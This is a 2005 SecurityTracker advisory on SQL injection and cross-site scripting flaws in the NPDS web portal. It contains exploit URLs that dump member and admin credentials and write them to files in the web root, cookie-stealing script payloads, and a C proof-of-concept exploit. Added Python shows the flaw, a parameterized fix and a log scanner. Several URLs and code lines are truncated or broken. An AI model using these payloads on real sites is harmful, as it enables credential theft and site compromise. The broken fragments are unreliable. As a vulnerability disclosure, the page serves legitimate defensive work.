SecurityTracker.com
SecurityTracker Archives

Category:   Application (Generic)  >   Net Portal Dynamic System (NPDS)
Vendors:   npds.org
NPDS Input Validation Holes in 'glossaire' Module and Links Search Script Permit SQL Injection
SecurityTracker Alert ID:  1014073
SecurityTracker URL:  http://securitytracker.com/id/1014073
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 29 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   NoSP and Romano reported several vulnerabilities in NPDS. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

The '/modules/glossaire/glossaire.php' script (which is not installed by default) does not properly validate user-supplied input in the 'terme' variable. Some demonstration exploit URLs are provided:

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,

The 'links.php?op=search' script does not properly validate user-supplied input in the 'query' parameter. Some demonstration exploit URLs are provided:

http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'

http://[target]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/va
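The root cause the reporters give for glossaire.php (the parameter is run through stripslashes() and then used directly in the query) is illustrated below in an added Python example; it is not code from the advisory or from NPDS. The table layout, column names, query shape and payload are constructed stand-ins, SQLite stands in for MySQL, and addslashes() emulates the magic_quotes_gpc escaping that PHP applied to request parameters at the time. The unsafe function reproduces the concatenation flaw; the safe function binds the value as a parameter instead, which is the fix a code review would ask for.

```python
import sqlite3

# Constructed payload in the same shape as the advisory's glossaire URL:
# close the string literal, UNION in rows from the users table, comment out
# the rest of the original WHERE clause. Column count must match the query.
PAYLOAD = "x' UNION SELECT 0, uname, pass FROM users WHERE uname <> '' --"


def make_db():
    """Constructed in-memory stand-in for a glossary table and a users table.
    The schema is an assumption for this example, not NPDS's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE glossaire (id INTEGER, terme TEXT, definition TEXT, affiche TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO glossaire VALUES (1, 'xss', 'cross-site scripting', '1');
        INSERT INTO glossaire VALUES (2, 'hidden', 'not shown', '0');
        INSERT INTO users VALUES ('alice', 'hash-of-alice-pw');
        INSERT INTO users VALUES ('bob', 'hash-of-bob-pw');
    """)
    return conn


def addslashes(s):
    """Emulates PHP's addslashes(), i.e. what magic_quotes_gpc did to input."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def stripslashes(s):
    """Emulates PHP's stripslashes(): every backslash-escaped char is unescaped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def search_terme_unsafe(conn, raw_terme):
    """Mirrors the flaw described in the advisory: the runtime-escaped parameter
    is passed through stripslashes() (undoing the escaping) and concatenated
    into the SQL text, so the quote in the payload terminates the literal."""
    terme = stripslashes(addslashes(raw_terme))
    sql = ("SELECT id, terme, definition FROM glossaire "
           "WHERE terme = '" + terme + "' AND affiche != '0'")
    return conn.execute(sql).fetchall()


def search_terme_safe(conn, raw_terme):
    """Hardened form: a bound parameter never becomes part of the SQL text, so
    quotes, comment markers or UNION keywords in the value stay data."""
    sql = ("SELECT id, terme, definition FROM glossaire "
           "WHERE terme = ? AND affiche != '0'")
    return conn.execute(sql, (raw_terme,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe:", search_terme_unsafe(db, PAYLOAD))   # leaks users rows
    print("safe:  ", search_terme_safe(db, PAYLOAD))     # []
    print("legit: ", search_terme_safe(db, "xss"))
```

The same binding discipline covers the links.php case: the `INTO OUTFILE` write the advisory describes only works because the attacker controls the statement text, and a parameterized query removes that control regardless of which MySQL privileges the application account holds.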

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NPDS software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://[target]/npds/powerpack_f.php?language=<script>alert()</script>

http://[target]/npds/sdv_infos.php?sitename=<script>alert()</script>

http://[target]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://[target]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://[target]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E

The 'reply.php' script does not properly validate user-supplied input in the 'image_subject' parameter. A remote user can inject scripting code that will be permanently retained on the system.

http://[target]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NPDS software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
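Both the SQL injection and the XSS requests described above leave recognisable markers in web server access logs, which is the first place a defender would look to find out whether an unpatched NPDS install has been probed. The following Python scanner is an added example, not part of the advisory; the log lines are constructed in Apache combined format from the request shapes on this page, with placeholder client addresses and timestamps. It URL-decodes the request target before matching, repeating the decode a bounded number of times so that double-encoded payloads (for example `%253Cscript%253E`) do not slip past the rules.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines modelled on the advisory's request
# shapes. Addresses, timestamps and the output file name are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [29/May/2005:10:01:02 +0200] "GET /npds/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20users%20where%20uname<>''/* HTTP/1.1" 200 5120
203.0.113.5 - - [29/May/2005:10:01:09 +0200] "GET /npds/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/x.txt'/* HTTP/1.1" 200 301
198.51.100.7 - - [29/May/2005:10:02:15 +0200] "GET /npds/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E HTTP/1.1" 200 2048
192.0.2.9 - - [29/May/2005:10:03:00 +0200] "GET /npds/links.php?op=search&query=google HTTP/1.1" 200 4096
192.0.2.9 - - [29/May/2005:10:03:30 +0200] "GET /npds/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=A HTTP/1.1" 200 1800
"""

# Apache combined log: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers taken from the request shapes in this advisory. Matching is done on
# the decoded target, so %20/%3C encodings and '+' separators are normalised.
RULES = [
    ("sqli-union",   re.compile(r"union\s+select", re.I)),
    ("sqli-outfile", re.compile(r"into\s+(out|dump)file", re.I)),
    ("xss-script",   re.compile(r"<\s*script", re.I)),
]


def decode_target(target, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so a payload
    hidden behind double encoding is still matched against the rules."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "path": decoded.split("?", 1)[0],
        "status": m.group("status"),
        "rules": hits,
    }


def scan_log(text):
    """Scan a whole log text and return the list of findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged links.php or glossaire request is not proof of compromise, since NPDS returns the normal page either way, so findings should be followed by checking the database for an extra file in the web root (the `INTO OUTFILE` target) and reviewing forum posts for stored script tags.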

Solution:   The vendor has issued a patch, available at:

http://www.npds.org/download.php?op=geninfo&did=115

Vendor URL:  www.npds.org/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  NPDS Input validation holes, Xss & SQL Injection


Script :
********
GNU/GPL.
http://www.npds.org


**********
- Non-persistent XSS
- Persistent XSS
 
 
*********
 
1) Non-persistent XSS:
----------------------
 
Simply request:

http://[site]/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://[site]/npds/powerpack_f.php?language=<script>alert()</script>
//same for push.php

http://[site]/npds/sdv_infos.php?sitename=<script>alert()</script>

http://[site]/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://[site]/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E

 
 
2) Persistent XSS:
------------------
certain dangerous tags.
 
http://[site]/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider


3) SQL Injection:
------------------

- Page /modules/glossaire/glossaire.php


The $terme variable goes through stripslashes() and is used directly in the

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20users%20where%20uname<>''/*
You will see the login/password of every member displayed on the
glossaire.php page!

http://[site]/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,aid,pwd,0,0%20from%20authors%20where%20name<>''/* 
You will see the login/password of every ADMIN displayed on the
glossaire.php page!

- Page links.php?op=search


2 exploits:

http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sqlinjection.txt'/*
members).


http://[site]/links.php?op=search&query=google%'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/sauvegarde.txt'/*
admin).

**************
 
or
Apply the corrective patch for Narval:
http://www.npds.org/download.php?op=geninfo&did=115
 

Proof of concept SQL injection links.php:
******************************************

#include<string.h>
#include<netdb.h>
#include<stdio.h>
#include<stdlib.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>


/* HTTP port */
#define PORT 80

#define MAXLEN 4096

main(int argc, char *argv[]){

if ((argc != 2) || (strlen(argv[1])>=256))
{
printf( "\n");
printf( "-----------------------------------------------------------------\n");
printf( " Xploit_NPDS-Narval\n");
printf( " NPDS Remote SQL Injection Proof of concept\n");
printf( " Vulnerability discovered && Exploit coded by \n");
printf( " Romano <romano_45_at_hotmail_dot_com> &&\n");
printf( " NoSP <NoSP_at_thehackademy_dot_net>\n");
printf( " Usage: ./Xploit_npds_5.0 <server> or <ip>\n");
printf( " ex : ./Xploit_npds_5.0 127.0.0.1 or\n");
printf( "      ./Xploit_npds_5.0 localhost or\n");
printf( "      ./Xploit_npds_5.0 www.site.com/npds\n");  
printf( "-----------------------------------------------------------------\n");
exit(1);
}

/* variable declarations */

int fd;

char *fin_cut;
char *deb_cut;
char dossier[512];
char path_disclosure[4096];
char recept[1024];
char path[2048];
char sql_inject[4096];
char envoi[]="non";

if(strstr(argv[1],"/")){
	deb_cut=strstr(argv[1],"/")+strlen("/");
	strncpy(dossier,"/",strlen("/"));
	strncat(dossier,deb_cut,strlen(deb_cut));
	strncat(dossier,"/",strlen("/"));
	/* cut off the domain name */
	fin_cut=strstr(argv[1],"/");
	*fin_cut='\0';

}else{
	strncpy(dossier,"/",strlen("/"));
}


if((fd=socket(AF_INET,SOCK_STREAM,0))==1 ){
	exit(EXIT_FAILURE);}

/*Define structure sockaddr_in*/
struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(PORT);
addr.sin_addr.s_addr=inet_addr(argv[1]);
memset(&(addr.sin_zero),'\0',8);



if( addr.sin_addr.s_addr!=-1){
	if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
	exit(EXIT_FAILURE);
	}
	}else{

	struct hostent *hp;
	if(hp=gethostbyname(argv[1])){
	bcopy( (char *) hp->h_addr_list[0],(char *)&(addr.sin_addr),sizeof(addr.sin_addr) );
	if(connect(fd,(struct sock_addr *)&addr,sizeof(struct sockaddr))==-1){
	exit(EXIT_FAILURE);
	}
	}

	strncpy(path_disclosure,"GET ",strlen("GET "));
	strncat(path_disclosure,dossier,strlen(dossier));
	strncat(path_disclosure,"modules/links/admin/links.php HTTP/1.1\r\nHost: ",strlen("modules/links/admin/links.php HTTP/1.1\r\nHost: "));
	strncat(path_disclosure,argv[1],strlen(argv[1]));
	strncat(path_disclosure,"\r\nConnection: Keep-Alive\r\n\n",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
/* and send it */
	if(send(fd,path_disclosure,strlen(path_disclosure),0)){printf("Recherche de $PATH du site.....\n");}

/* receive and process the responses */
while(recv(fd,recept,1024,0)){

		if(strstr(recept,"_error() in <b>") && strstr(recept,"/modules/")){
			deb_cut=strstr(recept,"_error() in <b>")+strlen("_error() in <b>");
			fin_cut=strstr(recept,"modules/");
			*fin_cut='\0';
			strncpy(path,deb_cut,strlen(deb_cut));
strncpy(envoi,"oui",strlen("oui"));
		}else{
		exit(1);
		}

		if(strstr(envoi,"oui")){
			strncpy(sql_inject,"GET ",strlen("GET "));
			strncat(sql_inject,dossier,strlen(dossier));
			
strncat(sql_inject,"/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'",
strlen("/links.php?op=search&query=test%20'%20UNION%20SELECT%200,aid,pwd,0,0,0,0,0%20FROM%20authors%20where%20aid%3C%3E''%20INTO%20OUTFILE%20'"));
			strncat(sql_inject,path,strlen(path));
			strncat(sql_inject,"Authors.txt'/* HTTP/1.1\r\nHost: ",strlen("Authors.txt'/* HTTP/1.1\r\nHost: "));
			strncat(sql_inject,argv[1],strlen(argv[1]));
			strncat(sql_inject,"\r\nConnection: Keep-Alive\r\n\n\0",strlen("\r\nConnection: Keep-Alive\r\n\n\0"));
	
				if(send(fd,sql_inject,strlen(sql_inject),0)){
http://%s%sAuthors.txt\n",argv[1],dossier);
					exit(1);
				}else{
				exit(1);
				}
		}

bzero(recept,MAXLEN);
bzero(path,MAXLEN);
bzero(sql_inject,MAXLEN);
bzero(path_disclosure,MAXLEN);
}

close(fd);
return 0;
}

*********
 
NoSP <nosp@thehackademy.net>
Romano <romano_45@hotmail.com>

its quick fix ;)
 
 



Copyright 2019, SecurityGlobal.net LLC